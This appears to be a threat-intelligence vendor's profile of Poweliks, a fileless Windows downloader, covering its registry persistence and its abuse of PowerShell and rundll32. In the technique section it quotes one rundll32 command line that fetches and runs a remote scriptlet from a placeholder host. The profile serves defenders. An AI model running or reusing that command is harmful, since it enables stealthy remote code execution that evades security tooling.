Poweliks is a Windows malware family widely characterized as a fileless Trojan downloader that gained attention for abusing legitimate Windows components to execute malicious code while leaving minimal traditional forensic artifacts on disk. It is closely associated with PowerShell abuse and with rundll32-based proxy execution of JavaScript through trusted Windows binaries, techniques that support defense evasion by blending malicious activity into normal system behavior. Poweliks is also known for using unusual and concealed Windows Registry storage mechanisms, including pseudo-hidden registry keys, to maintain persistence and hide payloads or commands from common administrative and security tools.
The malware’s behavior centers on in-memory or script-based execution rather than conventional dropped executables. Reported tradecraft includes launching malicious code through PowerShell command-line execution and using rundll32 to invoke script execution paths, allowing payload staging and execution through signed Microsoft binaries. Its registry-centric persistence model and limited disk footprint made it an early and prominent example of fileless malware on Windows.
Poweliks primarily targets Windows systems. High-confidence reporting supports capabilities in persistence, defense evasion, and initial payload delivery or retrieval consistent with downloader behavior. It is frequently cited in discussions of malware that abuses trusted administrative tooling and signed binaries to reduce visibility to file-based defenses and conventional incident response workflows.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
6 distinct techniques documented for this family, organized by ATT&CK tactic.
Many fileless malware embed malicious PowerShell scripts whose commands are often the ones responsible for downloading and launching or executing the payload.
Rundll32 can also be used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" This behavior has been seen used by malware such as Poweliks.
Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations.
7 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Poweliks is described as malware that uses rundll32.exe to execute malicious JavaScript/script content indirectly, helping evade detection through proxy execution.
Poweliks is referenced as malware that abuses rundll32.exe to execute malicious JavaScript/script-based payloads, consistent with fileless execution and defense evasion.
Malware noted here for using rundll32.exe to execute malicious JavaScript/scriptlet content.
Poweliks is mentioned as malware that abuses rundll32.exe to execute malicious JavaScript/script-based payloads indirectly for evasion.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.